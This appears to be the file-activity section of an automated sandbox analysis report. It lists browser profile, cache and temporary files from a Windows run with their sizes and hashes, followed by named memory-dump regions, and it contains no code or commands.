Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
5a2d2ccc4eaa99d9389ea2bd0d27a575

SHA1
9a0b89ab2bb9c2d17ffff741d348697d59321aa0

SHA256
3ba5e00ed0ca5b9ab0483ffd53b10a37304d091ad315908af57bdd26c81ccd36

SHA512
40635351213c0b652170b9a5796e4b42eb7b03abbb1990cfa30e8b908df7c5107fbdfd5d58028ec04a999e476dd75cdf296e6bc1b64da93ddda95b683e8f3dca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
4bc8561d2e88c9ac40d7be595c82c1c1

SHA1
edb671e88dd05101eb9516099f2c44c968e67388

SHA256
32c80f65086eb76ebae73bafaa3e4ef7fb6c92ded6876d5665cb4d0fc3c1fa57

SHA512
18a77e40dae54341a74b9e7536447f41f72d79be78cd0a2956b190180a4701bfd7cc4eca178c67ab0b021f911ed27918d71ec7ff7566b3064fc3eb527e92fe8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
ef354d824c007ecfa38f272dba46d5bb

SHA1
59e50428aa05886bb97dccf2a6cd9667c064e7ce

SHA256
76fa482c7e93152a25059581010b540ce0ebddc0c5646024f31d12faba34a7db

SHA512
82ae9eae1dbf50fef3f1902773da59f7da2daf8308c3e5ad3cd4c2010a56828bffc16993e9f0068bbecd108ce727389304a935589c9458d87f06e12c344b8941

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
319B

MD5
fcbe6ecfe827502d1b117c9737c94c49

SHA1
c9606bf2817536b7b53319300e4a5cfcbdd042db

SHA256
7782b8564589a1e7230b55d3dee151d9388fb5d0402f74eea549578c2e647b13

SHA512
f81a5ebda2c3e44fbdde7f0dabac372cd7cdb4234a5c35d30759fad92e1b677e7d53ecf8a44c92be65173ca78992a37663a90b7346c985fb68bcbbea511ed917

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
8059913d6b8e3adef6dc0ef9d475cce1

SHA1
c9be115394ce8a7e88af2df2b61eeaf131aea6ef

SHA256
e2fe9d46f095ebc70be07b906dd6754458cb523a9027df5b77474e16dd162309

SHA512
39962e651199d2f3d2159294ad3fca7e9668ac665b57eee215f99cdf38cf77cf6d71daac4723b8424a076c9ef75ce039d4ab79187029245866c2515fc74f149f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
ba0416cd8d2af9506cf93049fc783163

SHA1
1b01a505ba805f36d274e229f2cd94dd18d93cba

SHA256
4a7011e8258123dcdb8a837ed6f6164b47198d1e8b72971803f52571620b64bc

SHA512
454d9df590da9b053c07c65d968f3cb5588f971af6f2afc069ce8d81d9938bb63ca844fe62ce2d470a8ad03c65274f26a6004cf3b84884250ba523c389d3c98e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
6B

MD5
a9851aa4c3c8af2d1bd8834201b2ba51

SHA1
fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

SHA256
e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

SHA512
41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
e922699d586787107cbc7ca8ed89c1f6

SHA1
c03742a705568544ad7c926413f7d3289c1b5736

SHA256
bb112cfaf3de0f239385caaa3dd843b8c3cf96f19b090fcec31850c1ac56a13a

SHA512
053344370a1e034d4ea0ec45bc0548bab2f4f447a0cbd05e082b1209583e6c53caae66eb9e72b45351c3d2f0ec726553db4b347551c4d0cb500b3f60cd44b112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
181B

MD5
eb3358a18fe3482fe6cabeeed2000c89

SHA1
4b1ff6435aa3e6d0a5c91f9ed6774a3b6885fc92

SHA256
56c6e02a473adbb53783f5f5bcc2027ad0cb7e1718d3d8e8464baa26a82fff32

SHA512
6d8da42c17b6efbc9434e5e5484dcb58b23895ea4e6100d84ae3a7fe5e1beda2a94510263fffc4b0376aeb1ff87de35fd05eec632691b61eeb2676653a10a57d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8b7949229200c949aa6e455b20343eff

SHA1
28822b6430a3a5cb48a3b38004db5b63d04e8815

SHA256
621b23cf161ff72b416b16df1ebf4c78254662384c85a6e65a2871b4bc5bfcc4

SHA512
29addc3df59cdf82f24ae14748a2c4be061b4644dcb6adaf1d1a89df6116149970b006cbea0c57b0061ca07cb87a54bfba520a2d20d481174bfc1455c50d24d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6f4df31b7379e403e9f8822379d88432

SHA1
078f15b5678c7b1bafc0ee56336575f47a64e338

SHA256
296bc81727999c3db6bd8204403888c5618843b7d505cc144efa4a8ce6f0a11a

SHA512
227c719d8b9047d31a7c74383cffa41e4211f84855e35e8a9fed48da51d349e977e44db1fd6fe3436fa2f0ada720c0ca6d9445cf50393e1eeb778528cbef2746

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1f913e579c5dd43fc8159ce55dc7cfc2

SHA1
e2221786e11a18a78411c28d91ce7bfa57eaf68e

SHA256
e2378b5191615123e14948de6fe8cd7cf644c7af9549e2f754667fbed0dcc4a2

SHA512
0db958b5d1987900a900adfa91f564a843d6cbcbeecf8d4cba0ea7c24d181fd5aea0d02778244cca21fa82d6e5268e137930945361cfeff1278f60713ba2183c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6c8c36e1a065429ded1b00b81471e3e2

SHA1
dcc781efeac7a886bee8743128c9cc0510f11a33

SHA256
acea579dcee9eca736b11f95a1668a0864335503d659905742090eeab86594b3

SHA512
0475dd9c7acab76b930b3899562b8fc4791130c1c3c20fc49a672772b0ac353dfaf72f7fbe99e2cd8a61d799b99d92443ec24bb2297f813a58e45bcc718e881f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
afd12ff77c0054cf19fbdc464852f814

SHA1
831aea04f81846680ead8127e7faf97f48a1dbc0

SHA256
e52e91f142ef2354aa23cc500a91f5fcc83300147fe14f47abb37751a0435395

SHA512
d04af9195423521a71f3a5ab1bbb09830cfe5e4672510017a3eb575f01668c24f3d0ecf166f74f8f58ab9bb657231de282f67f6eedad8ddc161afe0f9150bcae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4bb75724148ac0e9a786b0f44c11f78c

SHA1
74df7e290328a6c078b9a3a2808d7bab7c7acc78

SHA256
46ab416a918b2927080ba3c5b17d3c7966311e8550d373ba5028d43a521d7e11

SHA512
dad7efaf8fec1b67b5e4f71e456a6c5c7cd45fb729d3c75aea0aac80e165a5578afb44622e5d47f5e6d05440e7f625c3a0ece4993c57523f9fe0837755665a10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

Filesize
36KB

MD5
3325a653ebfb6c8cf9726d5bb8ec6419

SHA1
133c93313e5a44c6e8fc9b6adba3907b3c714ea0

SHA256
daeb577b6d91fd27c42ec438f07c870d4886e6616c69c1b4e32c6c84733f8911

SHA512
00726fe4a9a9ebaff0ec505615cb28cccfd378f7217a41bb4b13c0aac4c28faa306a9344ce3fce63295337e8c35ef33a9978e0282dcdf21e93dd313f0f2e93eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
175B

MD5
6153ae3a389cfba4b2fe34025943ec59

SHA1
c5762dbae34261a19ec867ffea81551757373785

SHA256
93c2b2b9ce1d2a2f28fac5aadc19c713b567df08eaeef4167b6543a1cd094a61

SHA512
f2367664799162966368c4a480df6eb4205522eaae32d861217ba8ed7cfabacbfbb0f7c66433ff6d31ec9638da66e727e04c2239d7c6a0d5fd3356230e09ab6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
322B

MD5
c838169a905ed1bda8bd88ab123329fe

SHA1
54e2dbe400f9968c9fc198623ae05fc28dc45881

SHA256
1e5f008700a6a69b64189ec37e020ddb9fc3bb7bd7cfd37a3128a741c1d9a657

SHA512
d0c9bdccca8176bad679a62bbe4883f3472175bc537e9569b2018a1c113e55eab7a47205a8961b7b093f5ee032128ded719c053e4bfc02b47b79ce671a277f5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13369501925257308

Filesize
933B

MD5
59c040a09b7589ad18a941513980bd15

SHA1
d08854563ed0cca3f293a59d8b84748df5221c45

SHA256
bd178d8c58f1e7b409c4393bc70aff68fb930562d5a323c6ff6ff077369f87a2

SHA512
28809121ccdcdf2bcebfaf04ed2c1e88ba582439ff47bc8d86c8cab3a272540b495b3f0c8bd105de3e24c3281a75ddb3d73c75448dbda263c790316724ca6634

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
c18d0cc78af847c41b93820a8f84ef98

SHA1
4a1cb804eb28815142ed545e2cb297650f6b0e8c

SHA256
521eb91f5cd1b8a348f1bd1e3f02763fc9e1adfdf9090d5a48e63079aa8b052b

SHA512
319ad3922fd5fcc79458f77a9f37ddcc8b6050369eaf2b18f6c93ba9fb6c137a901fb6c5459c100668c16eabdb13291752c98b5be606e33624064cac7e9b6db4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
77fae468065cff9aa6f6be92de95ee7b

SHA1
82c2abb58b5c664ba39414920de35f3b13800f70

SHA256
34c949683b537c61b51b3c42e53f33645790bb1c57faabe0372da70a02809d57

SHA512
e33eed75e2fe51a8dfa03857c4fcf76b02b2d996b665b5cf17b82932e8c12127d68386b0a2d1a7cd9ec0f466ff1dd80af34dff59f0adbcf69cbbfbed2561054f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
203B

MD5
d29f664d3e32c929017963cc9d1ad81c

SHA1
c108c4b65bd4c1ae072cdcf05967b68a8e224c64

SHA256
39f5d368e65133851e98c576ec834755ca5812386da7d8cb46fa98c344f79c8c

SHA512
b255a0f2865c70d69725629589c193c2a43d64ed3c29a348745c3ba4bfe12ab1b071238dd1f1dd2bf4dd4c26b8d8348ca9e317bff9193e049c43d2c3b3f38d44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c53ed2d0-177c-4eb3-8406-438e40c9a4e5.tmp

Filesize
6KB

MD5
2b28acb4f9b0bf00b90954c0acbb94c0

SHA1
c325fef78f3d7aec1037c35c0bf07cd653a5cbe2

SHA256
07190dbd0d3b4375127868cfb2b5bdb0df69792839bfb6d7c146547583667d56

SHA512
6fe9df1acfbe9eea288f130c005eb9255a2bba03b05df3f38531f9d6aa09f1d38d90cb7f842c33b7f3d2747c26a36af5ce8e8c30103a145de1419605fdbbd534

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e9da02a8-062a-46d5-9308-95220154c05f.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
015a94d26c686420e6f4acd4f02bd9c8

SHA1
6b52ad1cc368b26980dac2cef84c211f01918592

SHA256
316c01918cc4e6d561a7a01136ef0e5b36c85a168e93fd578269fa4764f52e76

SHA512
e3414b39d17441d413eec92f8e999dd2690f77b8835532a8d0efdeb90d0ef2b3483f198cc659e7a760ec766483b150307f0260ca61fbd797ae09d3d9f4b0067c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
7KB

MD5
768495375bd73c9ac711b8ea3b1a482a

SHA1
2025428e77d1494e42e0b3a82a81c1cd5e26ea08

SHA256
9c68c34a9d3d7a141c0057901d6331c12756d7c670a08d7ffd6399fd51e298e0

SHA512
7dcdcc7bcc598bdf3fce5b2ac6e05aa9a3a5b989af1b7db3c7baf1d9b53d4dd4dbdca9946121e201fcecc810bbbf76f07fa3a46b963e00e3de398825ac4bfcf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
59a12c3a44d9f02bc38c88ee063f754e

SHA1
17f1b0bcc8ec72ec72acb392151bfb73fe3465b8

SHA256
62508af6f03b959980ff5337f8c4aa76fb1fd6e81d7a6b0bee076b7f0d4d6c1e

SHA512
b0221a049cd914fe228cde554db52cbb39c12c4fcbee2f88796c1a0e3db383fa024bff1dabe7201e2b5a5bbe230fba469d4dfbeba56726a8e07fef920cada892

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
594B

MD5
b1236f7ffc8471e761fd851e51551e6d

SHA1
c88cc092e758be05435462fba2b4995fd77e2623

SHA256
d56dd19a2752775ba999f991b14d29ae12b25d0ec3638ee6bbed45fd97321278

SHA512
562ab9afe92435c0da7ea184ab1f15b5545515689ab816db948e824ab3595ce36a14c0d53b4e3fe34b459dc4b54c1fcc313398c6044e21460881112b1f9a25e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
eba18971878641b2bd8d9fe157551610

SHA1
e4b02e2aeb33d3c8ed0371caa3e9c8b95ebb0a25

SHA256
20ceb41dce64e71f4287178c44fe05351cbe62427c5ecad17412fd48415c5dab

SHA512
4c46e0b9826b1a6949d0e9f60211ac347314d54c2b7d642d615f9c344d01a6257961bb8c08aab74ada42b0e48554b5beac93e8869bf19bf962b7745ba5ae6cdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
2082d8aaa822afce12946dd11817599d

SHA1
8bd80c6c1dc1d7dfec90460016918e2b921975c5

SHA256
fd2e78599f27f1847e8c6dfb7166ebebd310e9427eba97a6457e697e306ee709

SHA512
34877087de3b4abbcfa95a54c333eaf524b328008cad9dc2cb92c6691c89ff6cf1b44354c20aec87a5826ca1783ae5c8ab514ceb31d9d00a400c75f68dfa6806

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
a5a48293fed7e5ad6d9b5b36dc91cfb1

SHA1
bfa27861c5dbf18a6fc5c01bb3f70b96f3013e3f

SHA256
0a6351c23aa862ef710fad9eaff25ba541f58b40d9f21169d681be8a0f78f52c

SHA512
1432cb04c077931e7a6162365e1fc18d8b962a312fffc1eccda26c7dd0889965881fd633e0c17d91662acc14d44bd002ab881ca3e8267f9d9cb7e6f9e7b88493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
8a349f5e79d1d68995054fbba888a6a6

SHA1
4eb873fdd25610b83f773657cb795de749dc2499

SHA256
3ee148733b3a3ad712a13638d151857cdecc8d741171fc6fbae7f7cfa66c10ad

SHA512
9330a6841a5bfb2d47f9a6077513e9e8dada6f8fd1f3642c010ed0e088b619e0182cbe770be6fe351fa391692118ba9808e835b64ad4e1784fed759e61fbb947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4a4b40beab31f8d4036bf0d68dbb0f1a

SHA1
5332274bcbfdd6b55d05d504fe99b0fcb8234ee8

SHA256
9fb0f2f8ae633c42f20a6170d8b5ad2f0e80f11b35c7a5463663d5bfc32a965a

SHA512
383ddef71775fb3c7a73dfcea8a484aff390e90cd1ac2e5c3bd2a67bc230007ba60cd08aba0687e250efd6659edf1adfd95bf5df9bcd7f70d3d20081de07377e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b82e82df85bcdf50220b2a8fb0706f22

SHA1
be521cd8488fee69d8c699c8da7406828a87e40c

SHA256
af2d81522049dccd2d274281103f116dabec71da32a48153bfb38b58384d9a23

SHA512
ac3fed7dcf6dae444d768f0847391cb6891de8e38e103190b0b63cc6420adf7aea1273953bac3d76f8fbc396163b2e1d343964143c295e9870783f3c5fd36817

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
31db9c1fedcda22895039a112a0aab8e

SHA1
88295dc2723f9cb2a1c1824080680fe0e1b6752d

SHA256
70040a1a9801dc3a499ac5e27fd0a2e5d1c931535ee5998eca5174411b93927d

SHA512
d2caa8f9a45fea3d37858d50c4cd515696a482e72aded12b59ca98225f732d73deb81610629fae87fd95346eafcb74dada76e5ddef259076dca5432b381674ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
21bbc64d9bb8dc669cfa0a276ccd2fff

SHA1
9749ced68dc403d0995e569ef3e5dad8618d72d9

SHA256
67f8eadf4da0dfc8281acafa0d6149eb7a306ac1fca769d915a89f08e3f10ce3

SHA512
0636a725ef6e47e287126120292b3f7eeb4d608698406cf91688b760109668dea06483494326ee0c41c9fcfe31a02b377ea74364b78e9c5260b2381d9b0209e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b7a1d2605f48d9729234b6926ec79933

SHA1
e3d1eaf6e9adb985ab3ec792d02f9c83eb87cff9

SHA256
a52fa6cd81e8f4fa3eb0e73e978b5bf7023dbe4fb826adb1f6954d00e8c04e85

SHA512
2ce0ab524c9b6894489198aaa7357424a28208c3cd2f20acef694f71ce7d5542ac66889a73b0b613dad586095835b663a38dc6c6e1f986f0adadd76547fb57cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
c0a65c858d48eb924e3352c89327cf8b

SHA1
adf9c9536cb3fb1121439c4ac0ed9aa27e22aef7

SHA256
34ebb359c70ce6998452ce1fc9be576e252a0ff42d76daae21b7ab0840cd8fd6

SHA512
8a28de0598bbbe16a5fa1861bf3d04c09ad2ca4b51465d81b632f4a1be19f0282c7b8d71de22a9f635d2b8b261e7426ebfc9bece588089d88f2dfbb4f4622a10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
636129c2399ebb891b34535f8881df4e

SHA1
8d65823fc57ef9888bf427f55e6446564a64867c

SHA256
f9d6a079dd8a910fca95c3b651acf1ba8d824f47b26a97fd86d197b7c430b351

SHA512
f42b1d4505d14035847789f7a3117dc6b91cefb8402883efd72f47ef461ebfaa7f443560ca2c72ce1d1a5333be8c87b864ad710d362adeb32edd397e46c99897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b29d1cb3e9761a90902c4a66a2ba3d5a

SHA1
63c64b29626976bc0a143d72f291bb50727dffbe

SHA256
b998ed3cf206c4dac06d6028943a2f5accd73a93aca74420afe7480c464bf124

SHA512
54bac9ee28a46f57bfac8fecb6d8af504cb483b70f62f06febd9768d4254b611a082c8191d93599ebfd4a5b75a85dd387b758db1439df89337473c8f68a3cd88

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\activity-stream.discovery_stream.json

Filesize
43KB

MD5
308f69bf00acb9a2647e79252badc8cd

SHA1
ab03603904f97c8a7587e7b7b8b12639a5a1c8f2

SHA256
50446fa0f8f9057f374afb164f220af9a297114a6715f7f0198b126a1ebfb0bf

SHA512
55958126c7b31f187b3e3ba485b66d6ceafa5f04ed4e440f8a06fd179839df1b3e1b09f410ae22de81982a18cc145ee58b632209bd3afedb0164190062c8dab6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvy5f2wy.ksa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
5247260458f1e9c1ce28d9fc677d2e57

SHA1
7d03931493fee56e6ad6cdac7bc72b64a452ce3d

SHA256
0bdb59a542238bbd5207ab24d6fafdaecc2ed80338ed6be9b7dcca16ee546385

SHA512
8baff765c2c4a092dc3885be6a2b98f36742dee016497d4453d3fac23b3078d812039ca834768dce6c18a0a97b678744fac208831fc106b41aca5a758be0ad1b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\49d20a2c-e161-41f7-a5ba-3b069ec42603

Filesize
671B

MD5
80330fbcafe6e6c1d92e1d5561840327

SHA1
57b5e8919e32533af1648ab8ce65fa27fd6fd765

SHA256
521edf5ee6924fea64e62fa3bed14e7aff60e709745d631e71ece4e2863e4511

SHA512
5a04e6eec481cc14d98b2e82d93eabff7f1093c9ec214e9869611d87744e3f9a2f4a052c1369672cfb2008c07a0d82d856413ff2a1949e54cc490ea8485a5a6a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\5ffefe02-81ff-450e-b4a2-01311ed5c0d8

Filesize
29KB

MD5
6712f96e22cc5ee448dfcf9e45fe2dc1

SHA1
f1ac2cc7357f78202407633404e077f3f5e0e6e1

SHA256
02b1d9a243f5747474e4d695d0cc120b9ccb4c67b74908b944ad4ff2762e1f8d

SHA512
884b0fb877432bd86728e28ec4601fbb8472a3d29cf15f47a83c62efcaf4392b4ace4faeec40ad46ec85131cd49ba1b01c795b84149eb9bdbb13cda8828f510d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\pending_pings\f4845430-3545-48d2-9380-60c4243a6c69

Filesize
982B

MD5
c68e1718d1a4eac0a8dd5967c39edd0d

SHA1
6e2b205a35ea0db5267b8897e785cb31d1b21f6c

SHA256
8ae87bc0191e06beb6a332612cf800020cfa7dd69ac3e57d4a44b008223cdd25

SHA512
40fe54b5711e7ebc3297d642a165eee32a516b5689ee376d7a41ab94a285702889bd562e4f7dbb878c12f881022d86a15e3ece7d66041cf49fd4b2083bfee024

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\prefs-1.js

Filesize
11KB

MD5
d71c8864ce292c0daa5225fd3c8467cb

SHA1
f52c9924f35ff5e9758cff0f377e6f67529375e8

SHA256
61626ccf5df832a31721c9241d1faf6b395d1f95a2ac4ddedf6823aebc618191

SHA512
f6d1e7e66a5dab6ecd834014ab9b63aeffa4e1b9c7ad6659971970ce2abfe423ff32ac2ca9665597c94dbb6e04f98468d092c86101fbe7577bdd42022201a01a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\prefs.js

Filesize
11KB

MD5
2dbcea9e4a53c279835d9aed2aa58071

SHA1
1db4778fb43210cb4c0211cd2fcecac81083a6be

SHA256
29a51bb118659837c8b5bf131d253776da7effec43dc912d9e8b182bb06f8546

SHA512
d6edc25b7359739e48ece1d1d64703a6c39a9a51e63baf308fa38b5b7929d24daa84c53b9d48ebe10ef6c7eb7f763e939e5119433fe07cf376357a641a8eac9e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\prefs.js

Filesize
10KB

MD5
3837cc20ad58285cdad0f3d7df5a2c7f

SHA1
43524ebc985b7038b2d8700ff79f430df24607e4

SHA256
2c7a5f6c9f84198e604c05fdfbe4b54ad0cb034175893f4388a7fa0ad30de7be

SHA512
bb93b129a3a2fe7f751192d24f755bee9452923b657162727b4c4175acc8579e8dcee3ddd372c834aa8d7ba7d551529f3b7f81d585f3dc098844415f8ac0de5c

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 238774.crdownload

Filesize
978KB

MD5
f6e37f2a221fbca748053e8a46c3ef9f

SHA1
92f1a5d8aad5bc421b803a6048a8ce0bbee0c953

SHA256
ecdea80099e541809e0ecb95f993123974f8722ad4bb2b2bdc6b489ca02aaabd

SHA512
3c94e63bef99ab0d1cebe8f41b737b082600f1b2f1e723d134f1a400fe9f8dea0a75b263e3f7d5fa03bb8e4c9f84c3b567567b3026c5d5cf236e3c00fdb3f272

Download Submit
\??\pipe\LOCAL\crashpad_2628_OCMSLALIUAWQGSFJ

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/636-291-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/636-293-0x0000000005150000-0x00000000051EC000-memory.dmp

Filesize
624KB

Download
memory/636-294-0x0000000005800000-0x0000000005866000-memory.dmp

Filesize
408KB

Download
memory/636-297-0x0000000006190000-0x000000000619C000-memory.dmp

Filesize
48KB

Download
memory/636-295-0x0000000006370000-0x0000000006402000-memory.dmp

Filesize
584KB

Download
memory/636-296-0x00000000069C0000-0x0000000006F64000-memory.dmp

Filesize
5.6MB

Download
memory/3600-120-0x0000019EFDA90000-0x0000019EFDAB2000-memory.dmp

Filesize
136KB

Download
memory/3600-143-0x0000019EFE790000-0x0000019EFECB8000-memory.dmp

Filesize
5.2MB

Download
memory/3600-142-0x0000019EFE090000-0x0000019EFE252000-memory.dmp

Filesize
1.8MB

Download
memory/4644-290-0x00000201A2D20000-0x00000201A2D3A000-memory.dmp

Filesize
104KB

Download